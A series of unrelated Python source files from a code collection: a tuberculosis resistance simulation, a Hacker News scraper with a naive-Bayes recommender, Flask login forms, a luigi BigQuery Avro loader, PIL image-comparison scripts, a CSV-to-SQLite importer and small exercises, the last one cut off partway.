    P_resi_list = [0.0005, 0.0008, 0.001, 0.0015, 0.002] # rate of breakdown 0.05, 0.1, 0.15, 0.2, 0.3, 0.4, 0.5
    # Pt=0.2 # probability of seeking treatment 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8
    # Pr=0.3 # probability of resistant 0.01,0.05, 0.1, 0.15, 0.2, 0.3, .0.4, 0.5, 0.6, 0.7, 1
    gama_list = [0.0005, 0.001, 0.005, 0.01, 0.02] # rate of removal 0.01, 0.05, 0.1, 0.2, 0.3
    for t in t_list:
        for beta in beta_list:
            for P_resi in P_resi_list:
                for gama in gama_list:
                    # TB_sequence is a module-level global also read by get_resistant_eventlist
                    ancestor = file("E:/PYTHON_PROJECTS/TB_simulation/ancestor.fasta")
                    TB_sequence = ancestor.readline().strip()
                    ancestor.close()
                    SNP_positions = load_positions("E:/PYTHON_PROJECTS/TB_simulation/mutate_SNPs.txt")
                    resistant_SNPs = load_resistant_SNPs("E:/PYTHON_PROJECTS/TB_simulation/resi.vcf", SNP_positions,TB_sequence)
                    kappa = 0.1
                    patients = []
                    filename = "simulation_0.26_"+str(t)+"_"+str(beta)+"_"+str(P_resi)+"_"+str(gama)+".txt"
                    simulation_file = file("E:/PYTHON_PROJECTS/TB_simulation/output/" + filename)
                    reconstruct_patients_list(patients, simulation_file)
                    unremoved = set()
                    for i in range(0, len(patients)):
                        if not patients[i].removal:
                            unremoved.add(i)
                    count_sampling = []
                    count_resistant = []
                    count_unresistant = []
                    count_resistant_trans = []
                    count_resistant_acq = []
                    count_resistant_mevent = []
                    count_unresistant_oncere = []
                    # 20 independent sampling replicates per parameter combination
                    for i in range(0, 20):
                        count_resistant.append(0)
                        count_unresistant.append(0)
                        count_resistant_trans.append(0)
                        count_resistant_acq.append(0)
                        count_resistant_mevent.append(0)
                        count_unresistant_oncere.append(0)
                        seed = random.randint(0, 100000)
                        # NOTE(review): random.Random(seed) builds a discarded RNG instance;
                        # it does NOT seed the global generator used by patients_sampling
                        random.Random(seed)
                        sampling_patients = patients_sampling(unremoved, kappa)
                        count_sampling.append(len(sampling_patients))
                        sampling_patients.sort()
                        resistant_sample = set()
                        unresistant_sample = set()
                        for sample in sampling_patients: # count resistant samples and separate resistant and unresistant samples
                            if patients[sample].resistant:
                                count_resistant[i] += 1
                                resistant_sample.add(sample)
                            else:
                                unresistant_sample.add(sample)
                        for sample in resistant_sample:
                            # first marker '2' => resistance was transmitted, otherwise acquired
                            resistant_eventlist = get_resistant_eventlist(patients, sample, resistant_SNPs)
                            if resistant_eventlist[0] == '2':
                                count_resistant_trans[i] += 1
                            else:
                                count_resistant_acq[i] += 1
                            if len(resistant_eventlist) > 1:
                                count_resistant_mevent[i] += 1
                        for sample in unresistant_sample:
                            count_unresistant[i] += 1
                            resistant_eventlist = get_resistant_eventlist(patients, sample, resistant_SNPs)
                            if len(resistant_eventlist) > 0:
                                count_unresistant_oncere[i] += 1
                    # summarise the 20 replicates with pandas mean/std
                    count_sampling_pd = pandas.Series(count_sampling)
                    count_resistant_pd = pandas.Series(count_resistant)
                    count_unresistant_pd = pandas.Series(count_unresistant)
                    count_resistant_trans_pd = pandas.Series(count_resistant_trans)
                    count_resistant_acq_pd = pandas.Series(count_resistant_acq)
                    count_resistant_mevent_pd = pandas.Series(count_resistant_mevent)
                    count_unresistant_oncere_pd = pandas.Series(count_unresistant_oncere)
                    count_sampling_mean = count_sampling_pd.mean()
                    count_resistant_mean = count_resistant_pd.mean()
                    count_resistant_std = count_resistant_pd.std()
                    resistant_ratio = count_resistant_mean / count_sampling_mean *100
                    count_resistant_trans_mean = count_resistant_trans_pd.mean()
                    count_resistant_trans_std = count_resistant_trans_pd.std()
                    resistant_trans_ratio = count_resistant_trans_mean / count_sampling_mean *100
                    count_resistant_acq_mean = count_resistant_acq_pd.mean()
                    count_resistant_acq_std = count_resistant_acq_pd.std()
                    resistant_acq_ratio = count_resistant_acq_mean / count_sampling_mean *100
                    count_resistant_mevent_mean = count_resistant_mevent_pd.mean()
                    count_resistant_mevent_std = count_resistant_mevent_pd.std()
                    if not count_resistant_mean == 0:
                        resistant_mevent_ratio = count_resistant_mevent_mean / count_resistant_mean *100
                    else:
                        resistant_mevent_ratio = 0
                    count_unresistant_mean = count_unresistant_pd.mean()
                    count_unresistant_oncere_mean = count_unresistant_oncere_pd.mean()
                    count_unresistant_oncere_std = count_unresistant_oncere_pd.std()
                    # one tab-separated line per parameter combination
                    output_line = str(t) + " " + str(beta) + " " + str(P_resi) + " " + str(gama) \
                                  + "\t" + str(count_sampling_mean) \
                                  + "\t" + str(count_resistant_mean) + "\t" + str(count_resistant_std) + "\t" + str(resistant_ratio) \
                                  + "\t" + str(count_resistant_trans_mean) + "\t" + str(count_resistant_trans_std) + "\t" + str(resistant_trans_ratio) \
                                  + "\t" + str(count_resistant_acq_mean) + "\t" + str(count_resistant_acq_std) + "\t" + str(resistant_acq_ratio) \
                                  + "\t" + str(count_resistant_mevent_mean) + "\t" + str(count_resistant_mevent_std) + "\t" + str(resistant_mevent_ratio) \
                                  + "\t" + str(count_unresistant_mean) \
                                  + "\t" + str(count_unresistant_oncere_mean) + "\t" + str(count_unresistant_oncere_std)+"\n"
                    statistic_output.writelines(output_line)
    statistic_output.close()
7d2ddc300251629f2e243a3c6b8041fb588a3eaf | Python | Ronypea/Feed-personalization | /news.py | UTF-8 | 7,822 | 2.703125 | 3 | [] | no_license | import nltk
import pickle
from nltk.stem.lancaster import LancasterStemmer
from nltk.corpus import stopwords
import requests
from bs4 import BeautifulSoup
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from bottle import route, run, template, request
from bottle import redirect
import math
from math import log
Base = declarative_base()
class News(Base):
    """ORM model for a scraped Hacker News story."""
    __tablename__ = "news"
    id = Column(Integer, primary_key = True)
    title = Column(String)
    author = Column(String)
    url = Column(String)        # source domain text (e.g. "github.com"), as scraped by get_news
    comments = Column(Integer)
    points = Column(Integer)
    label = Column(String)      # user-assigned label 'never'/'maybe'/'good'; None = unlabelled
class Words(Base):
    """Per-word label counts used by the naive-Bayes title classifier."""
    __tablename__ = "words"
    word = Column(String, primary_key = True)
    never_word = Column(Integer)   # occurrences in titles labelled 'never'
    maybe_word = Column(Integer)   # occurrences in titles labelled 'maybe'
    good_word = Column(Integer)    # occurrences in titles labelled 'good'
def get_news(network_page):
    """Scrape a Hacker News listing page into a list of story dicts.

    Each dict has keys: author, comments, points, title, url.  Stories
    without metadata (e.g. job postings) fall back to 'None' / '0'.
    """
    soup = BeautifulSoup(network_page.text, 'html5lib')
    items = []
    story_rows = soup.table.find_all('tr', class_='athing')
    subtext_rows = soup.table.find_all('td', class_='subtext')
    for story, subtext in zip(story_rows, subtext_rows):
        title = story.find('a', class_="storylink").text
        try:
            url = story.find('span', class_="sitestr").text
        except:
            url = 'None'
        try:
            author = subtext.find('a', class_="hnuser").text
            points = subtext.find('span', class_="score").text
            comments = subtext.find_all('a')[-1].text[:-9]
        except:
            author = 'None'
            points = '0'
            comments = '0'
        items.append(dict(author=author, comments=comments,
                          points=points, title=title, url=url))
    return items
# Import-time setup: fetch the front page and open the SQLite-backed session
page = requests.get('https://news.ycombinator.com/')
news_list = get_news(page)
engine = create_engine("sqlite:///news.db")
Base.metadata.create_all(bind=engine)
session = sessionmaker(bind=engine)
s = session()   # module-level session shared by the route handlers below
def add_words(new_word, label):
    """Upsert `new_word` in the Words table, bumping the counter for `label`.

    `label` is 'never', 'maybe', or anything else (counted as 'good').
    Uses the module-level SQLAlchemy session `s` and commits immediately.
    """
    never_word, maybe_word, good_word = 0, 0, 0
    if label == 'never':
        never_word = 1
    elif label == 'maybe':
        maybe_word = 1
    else:
        good_word = 1
    word = s.query(Words).filter_by(word=new_word).first()
    if word is None:  # idiomatic None check (was: type(word) == type(None))
        record = Words(word=new_word,
                       never_word=never_word,
                       maybe_word=maybe_word,
                       good_word=good_word)
        s.add(record)
    else:
        word.never_word += never_word
        word.maybe_word += maybe_word
        word.good_word += good_word
    s.commit()
    return
stop = set(stopwords.words('english'))
st = LancasterStemmer()
'''
all_news = s.query(News).filter(News.label != None).all()
for news in all_news:
label = news.label
title = news.title
for symbol in '.;:-?!()':
title = title.replace(symbol, ' ')
title_split = title.split()
for word in title_split:
if word in stop:
pass
else:
word = st.stem(word)
word = word.strip().lower()
add_words(word, label) '''
def add_news(news):
    """Persist a list of scraped story dicts via the module-level session `s`."""
    for item in news:
        s.add(News(title=item['title'],
                   author=item['author'],
                   url=item['url'],
                   comments=item['comments'],
                   points=item['points']))
    s.commit()
    return
def next_page(network_page):
    """Follow the 'More' link on a HN listing page and fetch the next page."""
    soup = BeautifulSoup(network_page.text, 'html5lib')
    link = soup.find('a', attrs={'class': 'morelink'})['href']
    return requests.get('{dom}/{url}'.format(dom="https://news.ycombinator.com", url=link))
def counted():
    """Aggregate classifier statistics from the DB.

    Returns (count_words_in_lab, labels_prob): total word-occurrence counts
    per label [never, maybe, good], and the prior probability of each label
    among the labelled news rows.
    """
    count_words_in_lab = [0, 0, 0]
    for word in s.query(Words).all():
        count_words_in_lab[0] += int(word.never_word)
        count_words_in_lab[1] += int(word.maybe_word)
        count_words_in_lab[2] += int(word.good_word)
    news = s.query(News).filter(News.label != None).all()
    labels_prob = [0, 0, 0]
    for one_news in news:
        if one_news.label == 'never':
            labels_prob[0] += 1
        elif one_news.label == 'maybe':
            labels_prob[1] += 1
        else:
            labels_prob[2] += 1
    total = len(news)
    labels_prob = [count / total for count in labels_prob]
    return count_words_in_lab, labels_prob
def get_label(words, count_words_in_lab, labels_prob):
    """Naive-Bayes classify a tokenised title as 'never' / 'maybe' / 'good'.

    `count_words_in_lab` is the total word count per label and `labels_prob`
    the label priors, both from counted().  Stop words are skipped; the rest
    are stemmed before lookup.  Ties are resolved in order maybe > never > good.
    """
    result = [0, 0, 0]   # per-label log-probability accumulator
    for one_word in words:
        if one_word in stop:
            pass
        else:
            one_word = st.stem(one_word)
            record = s.query(Words).filter(Words.word == one_word).first()
            if type(record) != type(None):
                # each bare except swallows the math error raised by log(0)
                # when the word never occurred under that label
                try:
                    result[0] += log(int(record.never_word) / count_words_in_lab[0])
                except:
                    pass
                try:
                    result[1] += log(int(record.maybe_word) / count_words_in_lab[1])
                except:
                    pass
                try:
                    result[2] += log(int(record.good_word) / count_words_in_lab[2])
                except:
                    pass
    result[0] += log(labels_prob[0])
    result[1] += log(labels_prob[1])
    result[2] += log(labels_prob[2])
    if result[1] == max(result):
        return 'maybe'
    if result[0] == max(result):
        return 'never'
    if result[2] == max(result):
        return 'good'
@route('/')
@route('/news')
def news_list():
    """Render all unlabelled news, colour-coded by the predicted label."""
    count_words_in_lab, labels_prob = counted()
    news = s.query(News).filter(News.label == None).all()
    rows = []
    for one_news in news:
        # tokenize the title the same way the training pass does
        title = one_news.title
        for symbol in '.;:-?!()':
            title = title.replace(symbol, ' ')
        title = title.split()
        label = get_label(title, count_words_in_lab, labels_prob)
        if label == 'never':
            color = '#999999'
        elif label == 'maybe':
            color = '#33cccc'  # was '#033cccc': 7 hex digits is not a valid CSS colour
        else:
            color = '#ffffcc'
        rows.append((label, color, one_news))
    rows.sort(key=lambda i: i[0])
    return template('recommended_template', rows=rows)
'''
@route('/')
@route('/news')
def news_list():
rows = s.query(News).filter(News.label == None).all()
return template('news_template', rows=rows)
'''
'''
@route('/add_label/', method='GET')
def add_label():
label = request.GET.get('label').strip() # 1. Получить значения параметров label и id из GET-запроса
idd = request.GET.get('id').strip()
s = session()
record = s.query(News).filter(News.id == idd) # 2. Получить запись из БД с соответствующим id (такая запись только одна!)
rec = record[0]
rec.label = label # 3. Изменить значение метки записи на значение label
s.commit() # 4. Сохранить результат в БД
redirect('/news') '''
@route('/update_news')
def update_news():
    """Fetch the newest HN stories and insert any not already stored."""
    page = requests.get("https://news.ycombinator.com/newest")
    fetched = get_news(page)
    s = session()
    for item in fetched:
        # a story is a duplicate when both author and title already exist
        existing = s.query(News).filter(News.author == item['author']).filter(News.title == item['title']).all()
        if not existing:
            s.add(News(**item))
    s.commit()
    redirect('/news')
# Start the bottle development server (handlers registered via @route above)
run(host='localhost', port=8080)
| true |
a4cacf11c88df17b2df017e921f437de5d521671 | Python | flegrisgreen/Heliostats_dashboard | /appFuncs/forms.py | UTF-8 | 1,921 | 2.515625 | 3 | [] | no_license | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, TextAreaField, BooleanField, SelectField
from wtforms.validators import DataRequired, Length, Email, ValidationError, EqualTo
from appFuncs.models import Admin
from appFuncs import sql, con
class login_form(FlaskForm):
    """Admin login form: email + password, with a remember-me flag."""
    email = StringField('Email', validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    remember = BooleanField('Remember Me')
    submit = SubmitField('Login')
class registration_form(FlaskForm):
    """Admin sign-up form with uniqueness checks on username and email."""
    username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
    email = StringField('Email', validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])
    submit = SubmitField('Sign Up')
    # These functions are custom validator functions that check that the username and email are unique
    # (WTForms calls validate_<fieldname> automatically during form.validate())
    def validate_username(self, username):
        user = Admin.query.filter_by(username=username.data).first()
        if user:
            raise ValidationError('Username is not unique, please choose a different one')
    def validate_email(self, email):
        user = Admin.query.filter_by(email=email.data).first()
        if user:
            raise ValidationError('Email is not unique, please choose a different one')
def list_choices():
    """Build (value, label) pairs for every heliostat id in the DB."""
    helio_list = sql.selectall(con=con, tname='helio_list', cols='helio_id', pattern='order by helio_id asc')
    return [(helio, helio) for helio in helio_list]
class heliostat_select(FlaskForm):
    """Drop-down selector over all heliostat ids.

    NOTE(review): `choices` is evaluated once at class-definition (import)
    time, so heliostats added later will not appear until the app restarts
    -- confirm this is intended.
    """
    choices = list_choices()
    heliostat = SelectField('Select a heliostat', choices=choices)
    submit = SubmitField('Plot heliostat data')
f00eec3c767039d797eb1ddd1e61b7933d8c56ed | Python | KirinNg/Cluster_knn | /LiSanProject/creatDir.py | UTF-8 | 965 | 2.5625 | 3 | [] | no_license | import numpy as np
import os
DIR = []   # global vocabulary accumulator filled by the corpus loop below
def dirlist(path, allfile):
    """Recursively append every file path found under `path` to `allfile`.

    Directories are descended into; the (mutated) `allfile` list is returned.
    """
    for entry in os.listdir(path):
        full_path = os.path.join(path, entry)
        if os.path.isdir(full_path):
            dirlist(full_path, allfile)
        else:
            allfile.append(full_path)
    return allfile
# Build a deduplicated vocabulary from every file in both corpus halves
list1 = dirlist("20news-part1", [])
list2 = dirlist("20news-part2", [])
#np.save("LIST_1.npy",np.array(list1))
#np.save("LIST_2.npy",np.array(list2))
t = '%/\#$&|{}~'   # punctuation characters stripped before tokenising
for i in range(len(list1)):
    all_text = open(list1[i]).read()
    for k in t:
        all_text = all_text.replace(k,' ')
    all_text = all_text.split(" ")
    DIR = DIR + all_text
for i in range(len(list2)):
    all_text = open(list2[i]).read()
    for k in t:
        # NOTE(review): part2 replaces with '' while part1 replaced with ' ' --
        # this merges adjacent tokens; confirm the asymmetry is intentional
        all_text = all_text.replace(k,'')
    all_text = all_text.split(" ")
    DIR = DIR + all_text
print(len(DIR))
DIR = list(set(DIR))
# NOTE(review): set ordering is arbitrary, so this deletes an arbitrary token
# (presumably meant to drop the empty string '')
del DIR[0]
print(len(DIR))
#np.save("DIR.npy",np.array(DIR))
| true |
4adda659c32409ee51de9394f489d09d59797852 | Python | edx/luigi | /luigi/contrib/bigquery_avro.py | UTF-8 | 3,959 | 2.6875 | 3 | [
"Apache-2.0"
] | permissive | """Specialized tasks for handling Avro data in BigQuery from GCS.
"""
import logging
from luigi.contrib.bigquery import BigQueryLoadTask, SourceFormat
from luigi.contrib.gcs import GCSClient
from luigi.task import flatten
logger = logging.getLogger('luigi-interface')
try:
import avro
import avro.datafile
except ImportError:
logger.warning('bigquery_avro module imported, but avro is not installed. Any '
'BigQueryLoadAvro task will fail to propagate schema documentation')
class BigQueryLoadAvro(BigQueryLoadTask):
    """A helper for loading specifically Avro data into BigQuery from GCS.
    Copies table level description from Avro schema doc, BigQuery internally will copy field-level descriptions
    to the table.
    Suitable for use via subclassing: override requires() to return Task(s) that output
    to GCS Targets; their paths are expected to be URIs of .avro files or URI prefixes
    (GCS "directories") containing one or many .avro files.
    Override output() to return a BigQueryTarget representing the destination table.
    """
    source_format = SourceFormat.AVRO
    def _avro_uri(self, target):
        # Normalise a target into an .avro URI; prefixes become '<prefix>/*.avro'
        path_or_uri = target.uri if hasattr(target, 'uri') else target.path
        return path_or_uri if path_or_uri.endswith('.avro') else path_or_uri.rstrip('/') + '/*.avro'
    def source_uris(self):
        """Avro URIs (or wildcard patterns) for every input target."""
        return [self._avro_uri(x) for x in flatten(self.input())]
    def _get_input_schema(self):
        """Arbitrarily picks an object in input and reads the Avro schema from it."""
        assert avro, 'avro module required'
        input_target = flatten(self.input())[0]
        input_fs = input_target.fs if hasattr(input_target, 'fs') else GCSClient()
        input_uri = self.source_uris()[0]
        if '*' in input_uri:
            file_uris = list(input_fs.list_wildcard(input_uri))
            if file_uris:
                input_uri = file_uris[0]
            else:
                raise RuntimeError('No match for ' + input_uri)
        # single-element lists used as mutable cells written by the closure below
        schema = []
        exception_reading_schema = []
        def read_schema(fp):
            # fp contains the file part downloaded thus far. We rely on that the DataFileReader
            # initializes itself fine as soon as the file header with schema is downloaded, without
            # requiring the remainder of the file...
            try:
                reader = avro.datafile.DataFileReader(fp, avro.io.DatumReader())
                schema[:] = [reader.datum_reader.writers_schema]
            except Exception as e:
                # Save but assume benign unless schema reading ultimately fails. The benign
                # exception in case of insufficiently big downloaded file part seems to be:
                # TypeError('ord() expected a character, but string of length 0 found',).
                exception_reading_schema[:] = [e]
                return False
            return True
        input_fs.download(input_uri, 64 * 1024, read_schema).close()
        if not schema:
            # the schema never parsed: surface the last saved exception
            raise exception_reading_schema[0]
        return schema[0]
    def _set_output_doc(self, avro_schema):
        """Patch the destination table's description from the Avro schema doc."""
        bq_client = self.output().client.client
        table = self.output().table
        patch = {
            'description': avro_schema.doc,
        }
        bq_client.tables().patch(projectId=table.project_id,
                                 datasetId=table.dataset_id,
                                 tableId=table.table_id,
                                 body=patch).execute()
    def run(self):
        super(BigQueryLoadAvro, self).run()
        # We propagate documentation in one fire-and-forget attempt; the output table is
        # left to exist without documentation if this step raises an exception.
        try:
            self._set_output_doc(self._get_input_schema())
        except Exception as e:
            logger.warning('Could not propagate Avro doc to BigQuery table description: %r', e)
| true |
26f6c385fdc468184c56f11cc829aba6b9b19836 | Python | rahulpokharna/AutoCamera | /imgManip.py | UTF-8 | 8,536 | 3.375 | 3 | [] | no_license | from PIL import Image
import time
# Timer decorator
def timeit(f):
    """Decorator: print the wall-clock duration of each call to `f` and
    pass the return value through unchanged."""
    from functools import wraps

    @wraps(f)  # preserve f's __name__/__doc__ on the wrapper
    def helper(*args, **kwargs):
        start = time.time()
        to_return = f(*args, **kwargs)
        print('{} seconds'.format(time.time() - start))
        return to_return
    return helper
# NOTE(review): these path constants are not referenced anywhere visible in
# this file -- confirm before removing
loadpath = '/images/'
savepath = '/output/'
# Function to compare and get the image with the brightest or darkest pixels out of the input values
@timeit
def pixelComp(file1="pic1.JPG", file2="pic2.JPG", bright=True, filename="output.JPG"):
    """Compose an image taking, per pixel, the brighter (bright=True) or
    darker (bright=False) of the two inputs by perceived luminosity.

    Saves the result to `filename`.  Both inputs are assumed to share
    img1's dimensions -- TODO confirm callers guarantee this.
    Raises IOError if either image cannot be opened.
    """
    try:
        img1 = Image.open(file1)
        img2 = Image.open(file2)
        im1 = img1.load()
        im2 = img2.load()
        width, height = img1.size
        finalImg = Image.new('RGB', (width, height))
        finalPixels = finalImg.load()
        for i in range(width):
            for j in range(height):
                # compare perceived luminosity, not raw RGB tuples
                lum1 = calcLum(im1[i, j])
                lum2 = calcLum(im2[i, j])
                # take im1's pixel when it wins the requested comparison
                if (lum1 > lum2) == bright:
                    finalPixels[i, j] = im1[i, j]
                else:
                    finalPixels[i, j] = im2[i, j]
        finalImg.save(filename)
        print("completed: ", filename)
    except IOError:
        print("It broke")
        raise  # re-raise the caught IOError (was `raise(IOError)`, which discarded it)
# Function to compare and get the brightest or darkest image of the two
def imageComp(file1="pic1.JPG", file2="pic2.JPG", bright=True, filename="output.JPG"):
    """Save whichever whole image is brighter (bright=True) or darker overall.

    Overall brightness is the sum of per-pixel perceived luminosity
    (calcLum).  Failures to open either image print "It broke" and return.
    """
    try:
        img1 = Image.open(file1)
        img2 = Image.open(file2)
        pixels1 = img1.load()
        pixels2 = img2.load()
        width, height = img1.size
        total1 = 0
        total2 = 0
        for x in range(width):
            for y in range(height):
                total1 += calcLum(pixels1[x, y])
                total2 += calcLum(pixels2[x, y])
        winner = img1 if (total1 > total2) == bright else img2
        winner.save(filename)
        print("completed")
    except IOError:
        print("It broke")
        pass
# Def color shift prototype to see the dealio
@timeit
def colorShift(file="pic1.jpg", shift=5):
    """Experimental channel-shift effect: writes a colour-shifted copy of
    Image\\<file> to Output\\output_<shift><file>.

    NOTE(review): the author's own comments below acknowledge the pixel
    bookkeeping is incorrect (shifted writes clobber data that later
    iterations still need) -- the glitchy output is kept deliberately.
    """
    # image shift add pixel
    # iterate thru image and set value of pixel xyz to xyz+5 for r, and mins for b
    # Function to get the image with the greatest variety/range of colors
    # Maybe use numpy for the image manipulations instead? Might be moer efficient for the shifting, much faster as well
    try:
        # Open images into program
        img = Image.open("Image\\" + file)
        print("Loaded image")
        # Get pixels from images
        im = img.load()
        width, height = img.size
        print("Height: ", height, "\nWidth: ", width)
        # Output image
        finalImg = Image.new('RGB', (width, height))
        finalPixels = finalImg.load()
        print(type(im))
        for i in range(width):
            # Increment K here, or after the below loop
            for j in range(height):
                # Store the R values here, as
                # values[k][j], _, _= im[i,j]
                # Then store the final pixels as however
                # Convert the pixels into smaller gaps, so close colors are
                # not double counted, to try to get a larger difference in color
                # r1, g1, b1 = (im[i, j])
                r, g, b = (im[i, j])
                r2, g2, b2 = finalPixels[i, j]
                # Shift along the width
                iShiftPlus = min((i+shift) % width, i+shift)
                iShiftMinus = max((i-shift) % width, i-shift)
                # This is done incorrectly, we need to access the old data from each new place we place it, the current data in the final image and all other data
                # So we don't override it, but this effect is cool.
                # Assign New Photo image
                finalPixels[i, j] = r2, b, g2
                finalPixels[iShiftPlus, j] = r2, b2, g
                finalPixels[iShiftMinus, j] = r, b2, g2
        finalImg.save("Output\\output_" + str(shift) + file)
        # finalImg.save("output.jpg")
    except IOError:
        print("It broke")
        pass
# Function to get the image with the greatest variety/range of colors
def colorComp(file1="pic1.JPG", file2="pic2.jpg", filename="output.jpg"):
    """Save whichever of the two images uses more distinct colours.

    Colours are bucketed into a 16x16x16 RGB grid (each channel // 16) so
    near-identical shades are not double counted; the image hitting more
    buckets wins, with ties going to the second image as before.
    """
    try:
        img1 = Image.open(file1)
        img2 = Image.open(file2)
        pixels1 = img1.load()
        pixels2 = img2.load()
        width, height = img1.size
        buckets1 = set()
        buckets2 = set()
        for x in range(width):
            for y in range(height):
                r1, g1, b1 = pixels1[x, y]
                buckets1.add((r1 // 16, g1 // 16, b1 // 16))
                r2, g2, b2 = pixels2[x, y]
                buckets2.add((r2 // 16, g2 // 16, b2 // 16))
        # distinct-bucket count replaces the original 16x16x16 flag cube + sum
        if len(buckets1) > len(buckets2):
            img1.save(filename)
        else:
            img2.save(filename)
        print("completed")
    except IOError:
        print("It broke")
        pass
# Function to calculate luminosity based upon human sight perception
def calcLum(color):
    """Perceived luminosity of an (r, g, b) pixel, scaled to [0, 1]."""
    r, g, b = color
    weighted = r * 0.2126 + g * 0.7152 + b * 0.0722
    return weighted / 255
if __name__ == '__main__':
    # Earlier darkest-pixel composition experiments, kept disabled:
    # pixelComp(file1="Image\\brightest\\DSC_0454.JPG",
    #           file2="Image\\brightest\\DSC_0455.JPG", bright=False, filename="darkest1.JPG")
    # pixelComp(file1="Image\\brightest\\DSC_0456.JPG",
    #           file2="Image\\brightest\\DSC_0457.JPG", bright=False, filename="darkest2.JPG")
    # pixelComp(file1="Image\\brightest\\DSC_0458.JPG",
    #           file2="Image\\brightest\\DSC_0459.JPG", bright=False, filename="darkest3.JPG")
    # pixelComp(file1="Image\\brightest\\DSC_0460.JPG",
    #           file2="Image\\brightest\\DSC_0461.JPG", bright=False, filename="darkest4.JPG")
    # pixelComp(file1="darkest1.JPG",
    #           file2="darkest2.JPG", bright=False, filename="darkest5.JPG")
    # pixelComp(file1="darkest4.JPG",
    #           file2="darkest3.JPG", bright=False, filename="darkest6.JPG")
    # pixelComp(file1="darkest5.JPG",
    #           file2="darkest3.JPG", bright=False, filename="darkest7.JPG")
    # pixelComp(file1="darkest5.JPG",
    #           file2="darkest6.JPG", bright=False, filename="darkest_final.JPG")
    # colorComp(file1="img1.JPG", file2="img2.JPG", filename="darkest.JPG")
    # Active experiment: run colorShift with shifts 0, 25, ..., 250 and time it
    start_time = time.time()
    for i in range(0,11):
        # run_time = time.time()
        colorShift("DSC_0063.jpg", shift=25*i)
        # print("Run length with " + str(i) + " shift: ", time.time() - run_time)
    print("Total Time Elapsed: ", time.time() - start_time)
| true |
a4bbf174a995206a039ffdb77f349472b21c0e8f | Python | aakarshg/HIselector | /Satvik/DB_test.py | UTF-8 | 2,294 | 2.5625 | 3 | [] | no_license | import sqlite3
import csv
def create_db(db_loc, file_loc, tablename):
    """(Re)create `tablename` in the SQLite db at `db_loc` from a CSV file.

    The CSV's first row supplies the column names (all columns stored as
    TEXT); every column whose name ends in ``_id`` gets an index.  Data rows
    whose column count differs from the header are skipped.  An empty CSV
    creates nothing.

    WARNING: `tablename` and the CSV header values are interpolated directly
    into SQL (identifiers cannot be bound as parameters) -- only call this
    with trusted input.
    """
    conn = sqlite3.connect(db_loc)
    try:
        c = conn.cursor()
        with open(file_loc, "r") as f:
            reader = csv.reader(f)
            header = next(reader, None)  # replaces the per-row `header` flag
            if header is not None:
                c.execute("DROP TABLE IF EXISTS %s" % tablename)
                c.execute("CREATE TABLE %s (%s)" % (
                    tablename, ", ".join(["%s text" % column for column in header])))
                for column in header:
                    if column.lower().endswith("_id"):
                        index = "%s__%s" % (tablename, column)
                        c.execute("CREATE INDEX %s on %s (%s)" % (index, tablename, column))
                insertsql = "INSERT INTO %s VALUES (%s)" % (
                    tablename, ", ".join(["?" for column in header]))
                rowlen = len(header)
                for row in reader:
                    # skip lines that don't have the right number of columns
                    if len(row) == rowlen:
                        c.execute(insertsql, row)
        conn.commit()
        c.close()
    finally:
        conn.close()  # close even if parsing or SQL fails
# Table for Plan Attributes
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\Plan_Attributes_PP2.csv",
# "Plan_Attributes")
# Table for Issuer ID Mapping
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\IssuerID_Name_Updated.csv",
# "IssuerID_Name_Mapping")
# Table for Ratings
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\Quality_Ratings_PP1.csv",
# "Ratings")
# Table for Reviews
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\Review_Table.csv",
# "Reviews")
# Table for BBB Ratings
create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
"C:\\Users\\satvi\\Documents\\DDDM\\Project\\BBBRatings.csv",
"BBBRatings") | true |
6909fd5695a7e5f2f8eff93f732a30ab2d3b67cc | Python | carlson9/python-washu-2014 | /day4/recursion.py | UTF-8 | 134 | 3.703125 | 4 | [
"MIT"
] | permissive | def fib(n):
if n <=1:
return n
retun fib(n-1) + fib(n-2)
# Print "n : fib(n)" for n in 0..39 (Python 2 print statement)
for i in range(40):
    print "{0} : {1}".format(i, fib(i))
| true |
44291f59400165955d9b00d3db4daa72fe1b8a43 | Python | shrukerkar/ML-Fellowship | /PythonLibraries/Numpy/NullVectorSize10SixthValueTo11.py | UTF-8 | 251 | 3.78125 | 4 | [] | no_license |
#Write a Python program to create a null vector of size 10 and update sixth value to 11.
#[ 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
#Update sixth value to 11
#[ 0. 0. 0. 0. 0. 0. 11. 0. 0. 0.]
import numpy as np
# Build the size-10 null vector, show it, then set the element at index 6
# to 11 and show it again (matches the expected sample output above).
x = np.zeros(10)
print(x)
x[6] = 11
print(x)
| true |
5d7720a4777db322f570615b6fc6cbf1bf28358c | Python | mdddemo/Tensorflow-Project-Template | /mains/predict_main.py | UTF-8 | 1,368 | 2.5625 | 3 | [
"MIT"
] | permissive | # coding=utf-8
import tensorflow as tf
from models.fc_net_model import FCNetModel
from data_loader.data_set_loader import DataSetLoader
from data_loader.data_generator import DataGenerator
from utils.configs import process_config
from utils.logger import Logger
from operators.example_predictor import ExamplePredictor
def predict():
    """Run inference: build the graph, restore the model, and predict."""
    config = process_config("configs/predict.json")
    graph = tf.Graph()
    with graph.as_default():
        # Wire the prediction data set into the loader.
        generator = DataGenerator()
        loader = DataSetLoader(config, {'predict': generator}, default_set_name='predict')
        batch = loader.next_data
        # Model consumes the loader's next-data tensors directly.
        model = FCNetModel(config, batch)
        with tf.Session() as session:
